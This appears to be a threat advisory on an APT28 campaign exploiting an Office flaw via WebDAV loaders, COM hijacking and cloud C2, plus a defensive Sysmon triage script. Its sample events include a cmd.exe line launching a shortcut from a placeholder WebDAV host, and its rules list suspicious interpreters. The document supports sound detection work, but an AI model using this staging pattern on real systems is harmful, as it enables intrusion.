EXECUTIVE SUMMARY:
A state‑aligned cyber espionage group, tracked as APT28, has initiated an active campaign targeting military, government, maritime, and transport sectors across multiple countries in Europe and the Middle East. The adversary rapidly weaponized a newly disclosed Microsoft Office vulnerability, CVE‑2026‑21509, to deliver malicious attachments via spear‑phishing. These crafted documents trigger a multi‑stage attack sequence that leverages inherent trust in legitimate cloud services for command‑and‑control (C2), enabling stealthy compromise and ongoing access. In addition to traditional loaders, the campaign utilizes bespoke implants and Outlook‑centric backdoors to achieve both persistent control and sensitive data exfiltration.
The attack chain begins with crafted Office documents exploiting a security bypass flaw that triggers as soon as the file is opened, without requiring macros or explicit user interaction. Once invoked, this exploit retrieves malicious components via WebDAV, including a shortcut and a loader DLL that initiates a multi‑stage infection. The initial loader either decrypts embedded shellcode in an image file to run an in‑memory implant or installs a VBA module for an Outlook‑focused backdoor. Subsequent stages include a .NET‑based implant that conducts a cryptographic handshake with cloud storage infrastructure used as command and control, allowing encrypted tasks and responses to be exchanged under the guise of normal HTTPS traffic. Additional functionality observed includes persistence through COM object hijacking, process injection, and automated data collection from email clients. Throughout the campaign, encrypted payloads and legitimate cloud APIs are abused to evade traditional security controls, leaving minimal forensic artifacts on disk.
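The chain above leaves a small number of host-side behaviours that are unusual for an Office process regardless of the payload: a document-hosting process referencing or loading content from a WebDAV path, an Office process spawning a command interpreter or loader, a per-user COM InprocServer32 registration (the registry footprint of COM object hijacking), and an Outlook VBA project file being written by something other than Outlook. The following triage script is an added example written for this advisory, not code from the original report or from the researchers it cites; it runs over constructed Sysmon-style event dictionaries (the field names, the 203.0.113.10 host, the all-zero CLSID and the file paths are placeholders chosen for illustration) and returns a finding per matched rule.

```python
"""Triage constructed Sysmon-style events for the Office -> WebDAV -> loader chain.

Added example, not part of the original advisory. Event field names follow the
Sysmon style (image, parent_image, command_line, target_object ...) but the
events below are constructed for illustration; hosts, CLSID and paths are placeholders.
"""
import re

# Office host processes whose children and loads we scrutinise (constructed list).
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters/loaders that an opened document should not normally launch.
SUSPICIOUS_CHILDREN = {"cmd.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe", "powershell.exe"}

# UNC form used by the Windows WebDAV mini-redirector, e.g. \\host@SSL\DavWWWRoot\share\x.lnk
# (the host part may carry an @SSL or @port suffix; the greedy host match covers both).
WEBDAV_PATH_RE = re.compile(r"\\\\[^\\\s]+\\DavWWWRoot\\", re.IGNORECASE)
# Per-user COM server registration overrides the machine-wide handler for that CLSID.
COM_INPROC_RE = re.compile(
    r"^HK(?:U\\[^\\]+|CU)\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]{36}\}\\InprocServer32",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    """Lower-cased final path component of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events):
    """Return a list of (rule_name, detail) findings for the given event dicts."""
    findings = []
    for ev in events:
        kind = ev.get("event")
        if kind == "process_create":
            parent = _basename(ev.get("parent_image", ""))
            child = _basename(ev.get("image", ""))
            cmdline = ev.get("command_line", "")
            if parent in OFFICE_HOSTS and child in SUSPICIOUS_CHILDREN:
                findings.append(("office_spawns_interpreter", f"{parent} -> {child}: {cmdline}"))
            if parent in OFFICE_HOSTS and WEBDAV_PATH_RE.search(cmdline):
                findings.append(("office_webdav_reference", cmdline))
        elif kind == "image_load":
            proc = _basename(ev.get("image", ""))
            loaded = ev.get("image_loaded", "")
            if proc in OFFICE_HOSTS and WEBDAV_PATH_RE.search(loaded):
                findings.append(("office_loads_dll_from_webdav", loaded))
        elif kind == "registry_set":
            if COM_INPROC_RE.search(ev.get("target_object", "")):
                findings.append(("user_com_inprocserver_override", ev.get("details", "")))
        elif kind == "file_create":
            proc = _basename(ev.get("image", ""))
            target = ev.get("target_filename", "")
            # VbaProject.OTM is where Outlook keeps its VBA project; a non-Outlook writer
            # matches the Outlook-backdoor stage described above.
            if _basename(target) == "vbaproject.otm" and proc != "outlook.exe":
                findings.append(("outlook_vba_project_written", f"{proc} wrote {target}"))
    return findings


# Constructed sample telemetry: one benign event and four matching the described chain.
SAMPLE_EVENTS = [
    {"event": "process_create",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c start "" "\\203.0.113.10@SSL\DavWWWRoot\share\Readme.lnk"'},
    {"event": "image_load",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image_loaded": r"\\203.0.113.10@SSL\DavWWWRoot\share\loader.dll"},
    {"event": "registry_set",
     "image": r"C:\Windows\System32\rundll32.exe",
     "target_object": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\CLSID"
                      r"\{00000000-0000-0000-0000-000000000000}\InprocServer32\(Default)",
     "details": r"C:\Users\alice\AppData\Roaming\stage.dll"},
    {"event": "process_create",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
    {"event": "file_create",
     "image": r"C:\Windows\System32\rundll32.exe",
     "target_filename": r"C:\Users\alice\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM"},
]

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Each rule is deliberately independent of the payload's hashes or domains, so the script keeps working when the loader, the image-borne shellcode, or the cloud C2 tenant changes; in a real deployment the same logic maps onto EDR or SIEM queries over the corresponding process-creation, image-load, registry and file-create events.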
This campaign underscores the rapid operational tempo of advanced threat actors in integrating new vulnerabilities into targeted intrusion activities. By combining multi‑stage execution tactics with fileless techniques and abuse of trusted cloud platforms, the adversary demonstrates both persistence and evasion capabilities that significantly raise the bar for defenders. Organizations facing such threats are advised to prioritize patching of critical software flaws, enhance email filtering and user awareness, and adopt comprehensive monitoring capable of distinguishing anomalous encrypted traffic and process behaviors. The use of cloud services for covert command‑and‑control highlights the need for security controls that can correlate legitimate service usage with malicious intent.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| | T1199 | Trusted Relationship | - |
| | T1189 | Drive-by Compromise | - |
| Execution | T1203 | Exploitation for Client Execution | - |
| | T1204.002 | User Execution | Malicious File |
| | T1059.003 | Command and Scripting Interpreter | Windows Command Shell |
| Persistence | T1137.001 | Office Application Startup | Office Template Macros |
| Defense Evasion | T1055.001 | Process Injection | Dynamic-link Library Injection |
| | T1070.004 | Indicator Removal | File Deletion |
| | T1497.003 | Virtualization/Sandbox Evasion | Time Based Checks |
| Credential Access | T1528 | Steal Application Access Token | - |
| Discovery | T1082 | System Information Discovery | - |
| | T1057 | Process Discovery | - |
| Collection | T1114.001 | Email Collection | Local Email Collection |
| Command and Control | T1102.002 | Web Service | Bidirectional Communication |
| | T1071.001 | Application Layer Protocol | Web Protocols |
| | T1573.001 | Encrypted Channel | Symmetric Cryptography |
| | T1090.003 | Proxy | Multi-hop Proxy |
| Exfiltration | T1567.002 | Exfiltration Over Web Service | Exfiltration to Cloud Storage |
REFERENCES:
The following reports contain further technical details:
https://therecord.media/russian-hackers-microsoft-office-europe
https://www.trellix.com/blogs/research/apt28-stealthy-campaign-leveraging-cve-2026-21509-cloud-c2/